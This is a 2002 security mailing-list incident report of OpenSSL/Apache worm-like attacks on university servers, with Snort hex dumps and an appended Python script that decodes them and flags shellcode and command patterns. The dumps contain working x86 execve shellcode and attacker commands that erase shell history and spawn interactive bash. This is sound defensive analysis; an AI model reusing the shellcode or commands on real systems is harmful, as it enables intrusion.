From: Russell Fulton (r.fulton_at_auckland.ac.nz)
Date: Tue Sep 17 2002 - 04:53:38 CDT

    Hi, we have just had 3 servers attacked via OpenSSL using very similar
    exploits to the slapper worm. There are however differences:

    1/ there was no port 80 scan or probes (targets had clearly been
    selected beforehand)
    2/ there were many more iterations of the basic attack (around 30)

    None of the systems were compromised.

    Here is the snortsnarf summary of the attack on one system:

    Earliest: 17:37:20.489882 on 09/17/2002 (times are UTC +1200)
    Latest: 17:39:13.367289 on 09/17/2002

    3 different signatures are present for 211.224.129.96 as a source

        * 28 instances of OpenSSL worm attack
        * 28 instances of Apache chunked encoding exploit, uname -a
        * 31 instances of Apache chunked encoding exploit, AAAAA padding

    snort packet dumps from one iteration:

    [**] Apache chunked encoding exploit, AAAAA padding [**]
    09/17-05:37:33.740719 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800 len:0x21C
    211.224.129.96:51878 -> 130.216.50.18:443 TCP TTL:49 TOS:0x20 ID:12337
    IpLen:20 DgmLen:526 DF
    ***AP*** Seq: 0xB9A41B14 Ack: 0xFC880B34 Win: 0x1DCE TcpLen: 32
    TCP Options (3) => NOP NOP TS: 163261451 45779712
    81 D8 02 01 00 80 00 00 00 80 01 4E C4 44 22 F0 ...........N.D".
    A2 3B 7B 70 A8 24 1D D2 62 DA 15 96 7A 16 55 33 .;{p.$..b...z.U3
    D1 84 55 86 AA 1B 53 B0 E8 25 4B 4F 4A 01 D2 17 ..U...S..%KOJ...
    E6 43 31 09 EC 04 74 80 04 14 22 D6 BD E9 BD 8D .C1...t...".....
    2D 91 AC 39 C6 15 32 38 25 BC 15 8A ED CE C1 A9 -..9..28%.......
    D7 6B 92 02 E0 6A 28 69 E4 41 1F AB DD 46 46 CB .k...j(i.A...FF.
    A0 74 E8 5B C4 59 DC 9F B6 52 69 C6 A4 16 94 CC .t.[.Y...Ri.....
    13 FF C6 76 4F 3E A0 88 72 1A CE 11 AF 34 4D 45 ...vO>..r....4ME
    8D 7E 2E F4 BC 00 EF C6 FB 63 44 5D 0E 0C 2F 34 .~.......cD]../4
    2F 0B 48 2C 41 41 41 41 41 41 41 41 41 41 41 41 /.H,AAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 00 00 00 00 00 00 00 00 41 41 41 41 AAAA........AAAA
    01 00 00 00 41 41 41 41 41 41 41 41 41 41 41 41 ....AAAAAAAAAAAA
    8C D0 69 40 41 41 41 41 00 00 00 00 00 00 00 00 ..i@AAAA........
    00 00 00 00 41 41 41 41 41 41 41 41 00 00 00 00 ....AAAAAAAA....
    11 00 00 00 F0 37 3D 08 A0 11 1D 08 10 00 00 00 .....7=.........
    10 00 00 00 EB 0A 90 90 90 90 90 90 90 90 90 90 ................
    31 DB 89 E7 8D 77 10 89 77 04 8D 4F 20 89 4F 08 1....w..w..O .O.
    B3 10 89 19 31 C9 B1 FF 89 0F 51 31 C0 B0 66 B3 ....1.....Q1..f.
    07 89 F9 CD 80 59 31 DB 39 D8 75 0A 66 B8 CA A6 .....Y1.9.u.f...
    66 39 46 02 74 02 E2 E0 89 CB 31 C9 B1 03 31 C0 f9F.t.....1...1.
    B0 3F 49 CD 80 41 E2 F6 31 C9 F7 E1 51 5B B0 A4 .?I..A..1...Q[..
    CD 80 31 C0 50 68 2F 2F 73 68 68 2F 62 69 6E 89 ..1.Ph//shh/bin.
    E3 50 53 89 E1 99 B0 0B CD 80 .PS.......

    =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

    [**] OpenSSL worm attack [**]
    09/17-05:37:35.403562 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800 len:0x6F
    211.224.129.96:51878 -> 130.216.50.18:443 TCP TTL:49 TOS:0x20 ID:12340
    IpLen:20 DgmLen:97 DF
    ***AP*** Seq: 0xB9A41D11 Ack: 0xFC880B6D Win: 0x1DCE TcpLen: 32
    TCP Options (3) => NOP NOP TS: 163261618 45779777
    54 45 52 4D 3D 78 74 65 72 6D 3B 20 65 78 70 6F TERM=xterm; expo
    72 74 20 54 45 52 4D 3D 78 74 65 72 6D 3B 20 65 rt TERM=xterm; e
    78 65 63 20 62 61 73 68 20 2D 69 0A 0A xec bash -i..

    =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

    [**] Apache chunked encoding exploit, uname -a [**]
    09/17-05:37:35.403639 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800 len:0x64
    211.224.129.96:51878 -> 130.216.50.18:443 TCP TTL:49 TOS:0x20 ID:12341
    IpLen:20 DgmLen:86 DF
    ***AP**F Seq: 0xB9A41D3E Ack: 0xFC880B6D Win: 0x1DCE TcpLen: 32
    TCP Options (3) => NOP NOP TS: 163261618 45779777
    75 6E 73 65 74 20 48 49 53 54 46 49 4C 45 3B 20 unset HISTFILE;
    75 6E 61 6D 65 20 2D 61 3B 20 69 64 3B 20 77 3B uname -a; id; w;
    0A 0A ..

    =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

    Looks to me as if someone has repackaged the exploits to use in a more
    directed fashion.

    -- 
    Russell Fulton, Computer and Network Security Officer
    The University of Auckland,  New Zealand
    

    "It aint necessarily so" - Gershwin

    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
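Editor's note: the following triage helper is an added example, not part of Russell's post and not Snort or snortsnarf code. It decodes the three Snort packet dumps quoted above back into bytes (the payload lines are copied from the post, with the chunked-encoding dump trimmed to its tail and the "@" for byte 0x40 restored in the one ASCII column the archive mangled) and then checks each payload for what a responder would look for: a NOP sled, the Linux/x86 execve("/bin//sh") push sequence ending in mov al,0x0b / int 0x80, the count of int 0x80 traps, the length of the 0x41 padding, and the post-exploitation command strings sent once the shell is up. The function names, the 8-byte sled threshold and the command-string list are my own choices, not anything the post or Snort defines.

```python
import re
from typing import Dict, List, Tuple

# Payload hex dumps copied from the three Snort alerts in the post above
# (the first one cut down to its tail: end of the 'A' padding plus shellcode).
# Snort prints up to 16 hex bytes per line followed by an ASCII column in
# which non-printables are '.', so bytes are recovered from the hex column
# only; the ASCII column is lossy (the archive even dropped one '@' from it).
CHUNKED_EXPLOIT_TAIL = """\
41 41 41 41 00 00 00 00 00 00 00 00 41 41 41 41 AAAA........AAAA
01 00 00 00 41 41 41 41 41 41 41 41 41 41 41 41 ....AAAAAAAAAAAA
8C D0 69 40 41 41 41 41 00 00 00 00 00 00 00 00 ..i@AAAA........
00 00 00 00 41 41 41 41 41 41 41 41 00 00 00 00 ....AAAAAAAA....
11 00 00 00 F0 37 3D 08 A0 11 1D 08 10 00 00 00 .....7=.........
10 00 00 00 EB 0A 90 90 90 90 90 90 90 90 90 90 ................
31 DB 89 E7 8D 77 10 89 77 04 8D 4F 20 89 4F 08 1....w..w..O .O.
B3 10 89 19 31 C9 B1 FF 89 0F 51 31 C0 B0 66 B3 ....1.....Q1..f.
07 89 F9 CD 80 59 31 DB 39 D8 75 0A 66 B8 CA A6 .....Y1.9.u.f...
66 39 46 02 74 02 E2 E0 89 CB 31 C9 B1 03 31 C0 f9F.t.....1...1.
B0 3F 49 CD 80 41 E2 F6 31 C9 F7 E1 51 5B B0 A4 .?I..A..1...Q[..
CD 80 31 C0 50 68 2F 2F 73 68 68 2F 62 69 6E 89 ..1.Ph//shh/bin.
E3 50 53 89 E1 99 B0 0B CD 80 .PS.......
"""
SHELL_SETUP = """\
54 45 52 4D 3D 78 74 65 72 6D 3B 20 65 78 70 6F TERM=xterm; expo
72 74 20 54 45 52 4D 3D 78 74 65 72 6D 3B 20 65 rt TERM=xterm; e
78 65 63 20 62 61 73 68 20 2D 69 0A 0A xec bash -i..
"""
RECON = """\
75 6E 73 65 74 20 48 49 53 54 46 49 4C 45 3B 20 unset HISTFILE;
75 6E 61 6D 65 20 2D 61 3B 20 69 64 3B 20 77 3B uname -a; id; w;
0A 0A ..
"""

HEX_BYTE = re.compile(r"^[0-9A-Fa-f]{2}$")


def parse_snort_hexdump(dump: str) -> bytes:
    """Recover raw bytes from a Snort hex dump: per line, take hex tokens up to
    the first non-hex token (start of the ASCII column) and at most 16 of them.
    (A short line whose ASCII column starts with two hex digits would fool this;
    Snort's own output does not do that here.)"""
    out = bytearray()
    for line in dump.splitlines():
        taken = 0
        for tok in line.split():
            if taken == 16 or not HEX_BYTE.match(tok):
                break
            out.append(int(tok, 16))
            taken += 1
    return bytes(out)


def longest_run(payload: bytes, value: int) -> Tuple[int, int]:
    """(offset, length) of the longest run of `value`, or (-1, 0) if absent."""
    best, i = (-1, 0), 0
    while i < len(payload):
        if payload[i] != value:
            i += 1
            continue
        j = i
        while j < len(payload) and payload[j] == value:
            j += 1
        if j - i > best[1]:
            best = (i, j - i)
        i = j
    return best


# Linux/x86 execve("/bin//sh") idiom: push "//sh"; push "/bin"; ...; mov al,0x0b; int 0x80
BINSH_PUSH = b"\x68//sh\x68/bin"
EXECVE_TRAP = b"\xb0\x0b\xcd\x80"
INT80 = b"\xcd\x80"
# Strings seen in the two follow-up packets of the post; list is my choice.
COMMAND_PATTERNS = ["unset HISTFILE", "export TERM=", "exec bash -i", "uname -a", "id;"]


def shellcode_indicators(payload: bytes) -> Dict[str, object]:
    nop_off, nop_len = longest_run(payload, 0x90)
    return {
        "nop_sled": (nop_off, nop_len) if nop_len >= 8 else None,  # 8-byte threshold: assumption
        "longest_A_run": longest_run(payload, 0x41),
        "pushes_bin_sh": BINSH_PUSH in payload,
        "execve_int80": EXECVE_TRAP in payload,
        "int80_count": payload.count(INT80),
    }


def command_indicators(payload: bytes) -> List[str]:
    text = payload.decode("ascii", errors="replace")
    return [p for p in COMMAND_PATTERNS if p in text]


def triage(dump: str) -> Dict[str, object]:
    """Classify one Snort payload dump as exploit shellcode, post-exploitation
    shell commands, or neither, returning the evidence alongside the verdict."""
    payload = parse_snort_hexdump(dump)
    sc = shellcode_indicators(payload)
    cmds = command_indicators(payload)
    if sc["nop_sled"] or sc["pushes_bin_sh"] or sc["execve_int80"]:
        verdict = "exploit-payload"
    elif cmds:
        verdict = "post-exploitation-commands"
    else:
        verdict = "unclassified"
    return {"bytes": len(payload), "verdict": verdict, "shellcode": sc, "commands": cmds}


if __name__ == "__main__":
    for name, dump in [("chunked", CHUNKED_EXPLOIT_TAIL), ("shell", SHELL_SETUP), ("recon", RECON)]:
        print(name, triage(dump))
```

Run stand-alone it prints the verdict and evidence for each of the three dumps; the decoded lengths (202, 45 and 34 bytes for the trimmed exploit tail and the two command packets) match the IP DgmLen minus the 20-byte IP and 32-byte TCP headers shown in the alerts for the latter two. Decoding from the hex column rather than the ASCII column is deliberate: the ASCII rendering collapses every non-printable to '.', so it cannot distinguish a NOP sled from zero padding, and it is exactly the kind of text that gets mangled on its way through mail archives.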